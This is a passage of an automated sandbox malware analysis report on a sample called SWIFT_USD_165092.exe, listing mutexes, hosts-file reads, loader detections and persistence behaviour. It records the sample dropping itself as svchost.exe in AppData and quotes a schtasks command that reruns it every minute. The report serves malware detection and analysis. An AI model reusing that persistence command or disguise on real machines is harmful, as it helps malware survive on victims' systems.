                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4576:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4804:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2832:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_01
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SWIFT_USD_165092.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SWIFT_USD_165092.exeStatic file information: File size 2164736 > 1048576
                    Source: SWIFT_USD_165092.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SWIFT_USD_165092.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x20fe00
                    Source: SWIFT_USD_165092.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mscorlib.pdbMZ source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Accessibility.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdbSystem.Net.Http.dllXs source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: costura.costura.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdbmscorlib.ni.dllp source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver327 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO source: SWIFT_USD_165092.exe, 00000001.00000002.548199153.000000000623B000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.547387044.000000000619A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Management.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Drawing.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb3 source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000003.506792457.00000000061F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q costura.dotnetzip.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: DotNetZip.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B19000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER14F4.tmp.dmp.37.dr

                    Data Obfuscation

                    barindex
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2332, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 0_2_01283902 push ecx; ret 0_2_01283903
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 0_2_0128304F push cs; ret 0_2_0128314A
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 0_2_01283747 push ss; ret 0_2_01283752
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D77EB8 pushad ; ret 1_2_00D77EB9
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053B7EB2 pushad ; ret 14_2_053B7EB9
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 40_2_05767EB3 pushad ; ret 40_2_05767EB9

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txtJump to behavior

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
